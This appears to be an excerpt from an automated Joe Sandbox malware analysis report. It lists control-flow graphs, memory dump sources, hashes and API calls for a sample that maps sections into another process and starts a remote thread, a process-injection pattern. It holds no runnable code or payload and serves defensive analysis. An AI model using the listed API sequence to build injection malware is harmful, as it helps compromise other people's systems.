                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                          • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                          • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                          • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                          Control-flow Graph

                                          control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 236 4018a5-4018b7 230->236 234 401595-4015be 231->234 235 401896 231->235 234->235 244 4015c4-4015db NtDuplicateObject 234->244 235->236 241 4018c5 236->241 242 4018bc-4018e3 call 401193 236->242 241->242 244->235 247 4015e1-401605 NtCreateSection 244->247 249 401661-401687 NtCreateSection 247->249 250 401607-401628 NtMapViewOfSection 247->250 249->235 252 40168d-401691 249->252 250->249 253 40162a-401646 NtMapViewOfSection 250->253 252->235 254 401697-4016b8 NtMapViewOfSection 252->254 253->249 256 401648-40165e 253->256 254->235 257 4016be-4016da NtMapViewOfSection 254->257 256->249 257->235 260 4016e0 call 4016e5 257->260
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                          • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                          • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                          • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                          Control-flow Graph

                                          control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 276 4018a5-4018b7 270->276 274 401595-4015be 271->274 275 401896 271->275 274->275 284 4015c4-4015db NtDuplicateObject 274->284 275->276 281 4018c5 276->281 282 4018bc-4018e3 call 401193 276->282 281->282 284->275 287 4015e1-401605 NtCreateSection 284->287 289 401661-401687 NtCreateSection 287->289 290 401607-401628 NtMapViewOfSection 287->290 289->275 292 40168d-401691 289->292 290->289 293 40162a-401646 NtMapViewOfSection 290->293 292->275 294 401697-4016b8 NtMapViewOfSection 292->294 293->289 296 401648-40165e 293->296 294->275 297 4016be-4016da NtMapViewOfSection 294->297 296->289 297->275 300 4016e0 call 4016e5 297->300
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                          • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                          • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                          • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                          Control-flow Graph

                                          control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: CreateProcessTerminateThreadUser
                                          • String ID:
                                          • API String ID: 1921587553-0

                                          Control-flow Graph

                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005B01F8
                                          • Module32First.KERNEL32(00000000,00000224), ref: 005B0218
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133342006.000000000059E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_59e000_BzLGqYKy7o.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3833638111-0

                                          Control-flow Graph

                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004E024D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2132022634.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4e0000_BzLGqYKy7o.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: cess$kernel32.dll
                                          • API String ID: 4275171209-1230238691

                                          Control-flow Graph

                                          APIs
                                          • SetErrorMode.KERNELBASE(00000400,?,?,004E0223,?,?), ref: 004E0E19
                                          • SetErrorMode.KERNELBASE(00000000,?,?,004E0223,?,?), ref: 004E0E1E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2132022634.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4e0000_BzLGqYKy7o.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0

                                          Control-flow Graph

                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0

                                          Control-flow Graph

                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0

                                          Control-flow Graph

                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0

                                          Control-flow Graph

                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0

                                          Control-flow Graph

                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005AFEE0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133342006.000000000059E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_59e000_BzLGqYKy7o.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0

                                          Control-flow Graph

                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2132022634.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4e0000_BzLGqYKy7o.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: .$GetProcAddress.$l
                                          • API String ID: 0-2784972518
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2133342006.000000000059E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0059E000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_59e000_BzLGqYKy7o.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2132022634.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4e0000_BzLGqYKy7o.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:

                                          Execution Graph

                                          Execution Coverage:7.8%
                                          Dynamic/Decrypted Code Coverage:42.6%
                                          Signature Coverage:0%
                                          Total number of Nodes:122
                                          Total number of Limit Nodes:4

                                          Control-flow Graph
                                          • Entry: 401514; API calls on the graph: NtDuplicateObject, NtCreateSection, NtMapViewOfSection; internal calls: 401193, 4016e5
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0

                                          Control-flow Graph
                                          • Entry: 4014fe; API calls on the graph: NtDuplicateObject, NtCreateSection, NtMapViewOfSection; internal calls: 401193, 4016e5
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectView
                                          • String ID:
                                          • API String ID: 1652636561-0

                                          Control-flow Graph
                                          • Entry: 401542; API calls on the graph: NtDuplicateObject, NtCreateSection, NtMapViewOfSection; internal calls: 401193, 4016e5
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0

                                          Control-flow Graph
                                          • Entry: 401549; API calls on the graph: NtDuplicateObject, NtCreateSection, NtMapViewOfSection; internal calls: 401193, 4016e5
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0

                                          Control-flow Graph
                                          • Entry: 401557; API calls on the graph: NtDuplicateObject, NtCreateSection, NtMapViewOfSection; internal calls: 401193, 4016e5
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0

                                          Control-flow Graph
                                          • Entry: 402f97; API calls on the graph: RtlCreateUserThread, NtTerminateProcess
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: CreateProcessTerminateThreadUser
                                          • String ID:
                                          • API String ID: 1921587553-0

                                          Control-flow Graph
                                          • Entry: 60003c; API calls on the graph: VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA; internal calls: 600a3f, 600e0f, 600d90, 600a69, 600cce, 600ce7
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0060024D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2369051681.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_600000_teihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: cess$kernel32.dll
                                          • API String ID: 4275171209-1230238691

                                          Control-flow Graph
                                          • Entry: 69f998; API calls on the graph: CreateToolhelp32Snapshot, Module32First; internal call: 69f657
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0069F9C0
                                          • Module32First.KERNEL32(00000000,00000224), ref: 0069F9E0
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2369233302.000000000068D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0068D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_68d000_teihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3833638111-0

                                          Control-flow Graph
                                          • Entry: 600e0f; API calls on the graph: SetErrorMode (called twice)
                                          APIs
                                          • SetErrorMode.KERNELBASE(00000400,?,?,00600223,?,?), ref: 00600E19
                                          • SetErrorMode.KERNELBASE(00000000,?,?,00600223,?,?), ref: 00600E1E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2369051681.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_600000_teihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0

                                          Control-flow Graph
                                          • Entry: 4018e6; API calls on the graph: Sleep; internal calls: 401193, 40141f, 401514
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0

                                          Control-flow Graph
                                          • Entry: 401915; API calls on the graph: Sleep; internal calls: 401193, 40141f, 401514
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0

                                          Control-flow Graph
                                          • Entry: 4018f1; API calls on the graph: Sleep; internal calls: 401193, 40141f, 401514
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                          • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
